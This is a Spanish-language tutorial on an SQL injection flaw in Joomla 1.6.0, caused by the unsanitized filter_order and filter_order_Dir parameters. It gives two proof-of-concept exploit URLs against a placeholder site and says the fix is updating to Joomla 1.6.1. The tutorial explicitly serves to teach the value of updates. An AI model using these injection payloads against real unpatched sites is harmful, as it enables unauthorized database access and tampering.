Cada cierto tiempo aparecen nuevas versiones de Joomla que solucionan vulnerabilidades de seguridad del core, o nucleo. En este tutorial os quiero enseñar cómo se puede explotar una de estas vulnerabilidades, en concreto una del tipo inyección de SQL sobre Joomla 1.6.0, que descubrió el YGN Ethical Hacker Group.
Con esto no pretendo enseñaros a hacer hacking a sitios realizados con Joomla 1.6.0, sino ilustrar la importancia que tiene que nuestro sitio se encuentre actualizado para prevenir este tipo de ataques u otros posibles. También recordaros que es importante actualizar vuestras extensiones, ellas también pueden verse afectadas y debemos estar pendientes de sus actualizaciones de seguridad.
Descripción de la vulnerabilidad
Los parámetros filter_order y filter_order_Dir no estaban correctamente sanitizados, este hecho permitía que se pudidera hacer SQL Injection sobre Joomla. Un atacante podría inyectar sentencias SQL para manipular la base de datos, de forma que podría mostrar la información en el navegador web o modificarla.
Explotando la vulnerabilidad
Para explotar esta vulnerabilidad de seguridad solo habría acceder al sitio web que se va a atacar con una de las siguientes URLs. De esta forma se consigue inyectar "yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
{codecitation}
http://webatacada.com/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAA,&filter_order_Dir=2&limit=3&limitstart=4
{/codecitation}
{codecitation}
http://webatacada.com/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=1,&filter_order_Dir=yehg.net.BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB,&limit=3&limitstart=4
{/codecitation}
Solución
Actualizar a Joomla 1.6.1 o una versión superior. Los responsables de YGN avisaron al proyecto Joomla de esta vulnerabilidad y una vez fue corregida y publicada en Joomla 1.6.1 procedieron a liberar la información sobre cómo se explota esta vulnerabilidad.
En AyudaJoomla | Actualizar Joomla 1.6
En AyudaJoomla | Hackear Joomla 1.5
